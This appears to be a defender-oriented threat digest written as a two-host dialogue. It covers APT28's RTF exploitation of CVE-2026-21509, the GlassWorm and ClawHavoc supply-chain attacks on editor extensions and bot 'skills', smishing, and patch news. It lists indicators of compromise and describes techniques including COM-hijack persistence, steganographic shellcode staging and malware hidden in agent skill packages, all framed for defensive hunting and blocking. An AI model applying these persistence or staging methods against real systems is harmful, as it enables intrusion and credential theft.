EvilBit Threat Digest - RTFs, Rogue Plugins, and a Side of Credential Theft

KryptoKat: There are times where the enemy kicks down the door… and times where they get invited in through your editor’s extension system and your inbox. This is the second kind.

UncleSp1d3r: Also: if an RTF attachment is doing COM hijacks and hiding shellcode in a PNG, it’s not “a document.” It’s a tiny haunted house with central heating.

Operation Neusploit: APT28 turns Office into a launchpad (CVE-2026-21509)

UncleSp1d3r: Zscaler’s ThreatLabz dropped a detailed write-up on “Operation Neusploit,” linking Russia-aligned APT28 to in-the-wild exploitation of CVE-2026-21509, a Microsoft Office security feature bypass triggered via weaponized RTF files. Microsoft shipped an out-of-band fix on 2026-01-26, and Zscaler places observed exploitation around 2026-01-29. That’s not a lot of breathing room. (APT28 Leverages CVE-2026-21509 in Operation Neusploit - Zscaler ThreatLabz, CVE-2026-21509 - NVD)

The delivery is the classic APT comfort food: spearphishing attachment → user opens it → exploit chain lights up. What’s less classic is the payload mix. Zscaler describes MiniDoor, an Outlook VBA-based email stealer that forwards victim mail to attacker-controlled addresses, and a second path using PixyNetLoader, a multi-stage loader built for staying power.

PixyNetLoader is where it gets spicy. Persistence is established with COM hijacking plus a scheduled task (specifically a task named OneDriveHealth). COM hijacking is one of those “if you’re not looking for it, you won’t see it” techniques: it abuses per-user registry entries so Windows loads an attacker DLL when a COM object is instantiated. In this case, Zscaler points at a CLSID registry path under:

• HKCU\Software\Classes\CLSID\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\InProcServer32
• pointing to %programdata%\USO\PublicData\UserEhStoreShell.dll

Then there’s the staging trick: shellcode pulled from a PNG via LSB steganography (hiding data in the least-significant bits). It’s not “new,” but it’s reliably annoying. Images move around environments more freely than EXEs, and a lot of tooling treats them as inert.

The endgame: a Covenant Grunt implant, with a C2 bridge abusing the Filen API. Add some geo/User-Agent gating on the server side (don’t serve the good stuff to sandboxes), and you’ve got a chain designed to waste analyst time and keep defenders arguing with their own telemetry.

KryptoKat (what to do today):

• Patch Office for CVE-2026-21509 across affected versions called out by Microsoft/Zscaler (Office 2016/2019/LTSC/365 Apps). (Zscaler)
• Hunt for the pivots Zscaler published: scheduled task OneDriveHealth, the COM hijack registry keys, dropped artifacts like MicrosoftOutlookVbaProject.OTM under %appdata%, and the PNG drop under %programdata%.
• Block and investigate the campaign infrastructure Zscaler listed, including freefoodaid.com and wellnesscaremed.com. (Zscaler)

Marketplace malware, part ∞: extensions and “skills” bite developers again

Update: from “malicious VS Code extensions” to Open VSX distributing GlassWorm

KryptoKat: Since we last talked about sketchy editor extensions turning dev workstations into snack bars for threat actors, here’s the sequel: same genre, new theater.

A supply chain incident in the Open VSX Registry (the open alternative ecosystem for VS Code-compatible extensions) pushed GlassWorm malware via compromised extensions, apparently using a compromised developer publishing account as the injection point. The impact is the usual dev-box catastrophe set: credential theft, crypto targeting, and macOS data collection. (Open VSX Supply Chain Attack Used Compromised Dev Account to Spread GlassWorm, Socket: GlassWorm Loader Hits Open VSX via Suspected Developer Account Compromise, Fluid Attacks: GlassWorm supply chain attack – VS Code Extensions)

UncleSp1d3r: The part that keeps repeating: the “exploit” is rarely a memory corruption bug. It’s publishing rights. If I can ship code to your editor, I don’t need to bypass your EDR. I just need you to click “Update.”

Practical takeaways:

• Treat editor extension ecosystems as code execution pipelines, not “nice-to-have tooling.”
• Lock down extension installation/update sources in enterprise-managed dev environments where you can.
• Audit publisher accounts and rotate/secure publishing credentials like they’re production keys (because they are).

ClawHavoc: malicious “skills” in a bot ecosystem (341 found, 335 drop AMOS)

UncleSp1d3r: Koi’s report on ClawHavoc is the same supply-chain story wearing a different costume: not an IDE marketplace this time, but a bot/agent ecosystem (“skills” for OpenClaw/ClawHub). They found 341 malicious skills, 335 tied to deploying AMOS (Atomic macOS Stealer), plus a handful of outliers. (ClawHavoc: 341 Malicious Clawed Skills Found by the Bot They Were Targeting)

Koi describes a familiar operator playbook: obfuscation, hiding scripts inside “prerequisites,” and generally making the malicious behavior look like normal setup friction. The point isn’t elegance; it’s scale. If your platform encourages plug-and-play community contributions, you’ve built a distribution channel. Attackers love distribution channels.

KryptoKat (defender posture):

• Disable or heavily gate auto-install from untrusted marketplaces.
• Require integrity/provenance checks where possible (signing, verified publishers, internal mirrors).
• For dev/agent tools: assume “skill” packages can contain installers, downloaders, and credential harvesting logic, and review accordingly. (Koi)

Social engineering isn’t dead. It’s just on your lock screen.

INPS-themed smishing targets Italian citizens for employment/CUD data

KryptoKat: CERT-AGID warned about an INPS-themed smishing campaign targeting Italian citizens, luring victims into handing over sensitive employment and CUD-related data--prime identity-theft material. They included specific malicious infrastructure, such as the domain inpsdati.it, which makes this more than “be careful out there.” (CERT-AGID advisory)

If you operate in Italy (or support users who do):

• Block known URLs/domains from the advisory at DNS/web controls.
• Make sure your user messaging is specific: “INPS will not ask for this over SMS; verify via official channels.”

McDonald’s tells customers to use better passwords (yes, really)

UncleSp1d3r: In the “we live in a simulation written by a tired intern” corner, McDonald’s ran a password-hygiene push because menu-item passwords are showing up frequently in compromised credential sets. Predictable passwords are still doing predictable things. (McDonald's tells customers to use better passwords, McDonald’s Netherlands Takes Passwords to the Streets)

Blue-team translation: if your org still allows weak passwords without MFA, you’re not defending accounts. You’re curating a future incident report.

Defender’s workshop: detection engineering as an arms race (PowerShell edition)

KryptoKat: A thoughtful piece from detect.fyi frames detection engineering as game theory. Every detection creates incentives for evasions, and the “win condition” is often resilience rather than perfect prevention, especially in PowerShell land where encoding/obfuscation is basically part of the ecosystem. (Move and Countermove: Game Theory Aspects of Detection Engineering)

Even if you don’t buy the framing, the operational advice is solid:

• Prefer detections that focus on effects (process trees, suspicious parent/child chains, credential access) over brittle string matches.
• Decode and normalize what you can (base64 parameters, script block logging) so “obfuscation” stops being invisibility and becomes just… noise you can parse.

Policy weather (because it will hit your budget)

Federal shutdowns and cybersecurity drag

KryptoKat: A Forbes piece (with broader discussion echoed in public commentary) highlights how shutdown dynamics can stall cybersecurity R&D and deployment timelines. It’s less “headline breach,” more “slow erosion of capability.” This matters if your programs depend on federal partnerships, grants, or just the downstream effects of delayed modernization. (Forbes, Politico)

SBOM guidance rollback draws sharp criticism

UncleSp1d3r: Dark Reading covered criticism (including from OWASP’s founder) around rescinding Biden-era SBOM-related guidance, potentially reducing procurement pressure for attestations and NIST SSDF alignment. Politics aside, the operational reality is simple: if your buyers stop asking for supply-chain transparency, vendors stop feeling the heat. (Dark Reading)

Defender takeaway: don’t wait for mandates to justify SBOM intake and secure development requirements. If you can ask for provenance, you should.

Patch shelf: Nessus plugins and two quiet-but-real local escalation CVEs

KryptoKat: Tenable pushed a batch of Nessus plugin updates touching common enterprise stacks (including identity platforms and major Linux distros). If you treat scanner updates as “background noise,” this is your reminder that scanners only find what they know how to look for. (Nessus Plugin Updates)

Two CVEs called out in the update stream are both in the “local privilege escalation via installer/package permissions” family:

• CVE-2024-22029: insecure permissions in packaging (described in NVD as a Tomcat packaging race-to-root scenario). (NVD)
• CVE-2025-2759: incorrect folder permissions in an installer, enabling local privilege escalation (NVD references ZDI). (NVD)

Plain-English takeaway: these aren’t the flashy internet RCEs, but they matter in real environments. They are critical where endpoints are shared, build agents are messy, or “developer workstation” means “local admin with a browser and a dream.”

Closing: the attacker’s favorite feature is “Install”

KryptoKat: This issue had a theme, and it wasn’t subtle: execution by convenience. RTFs that shouldn’t execute do. Extensions that shouldn’t be trusted are. Marketplaces that shouldn’t be “production pipelines” become exactly that.

UncleSp1d3r: If you need a 1980s sci-fi moral: the monster isn’t always in the mainframe. Sometimes it’s in the add-on menu.

Keep your Office patched, treat plugin ecosystems like hostile code, and remember that “publisher access” is just another name for “production access.”

-KryptoKat & UncleSp1d3r